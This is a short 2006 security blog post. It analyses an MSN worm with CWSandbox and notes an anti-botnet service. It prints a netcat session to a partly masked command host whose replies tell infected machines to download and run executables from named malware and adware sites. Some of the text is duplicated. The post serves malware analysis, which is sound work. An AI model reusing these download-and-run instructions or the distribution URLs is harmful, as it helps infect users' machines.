CWSandbox vs. MSN Worms
Thursday, September 28. 2006
The very good weblog from F-Secure had recently an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). For downloading additional malware to the infected hosts, it uses a very simple transfer mechanism on TCP port 80:
So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, on of them being again Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.
And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies who offer such services, let's see who is successful...
$ nc XXX.64.38.YYY 80
down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;
So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, on of them being again Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.
And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies who offer such services, let's see who is successful...
".
